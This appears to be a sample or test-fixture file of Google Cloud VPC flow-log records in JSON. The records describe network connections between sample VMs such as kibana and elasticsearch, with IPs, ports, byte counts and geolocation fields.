+{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"67.43.156.13","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"67.43.156.13","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"67.43.156.13","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"67.43.156.13","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"67.43.156.13","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"67.43.156.13","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"67.43.156.13","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.168.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 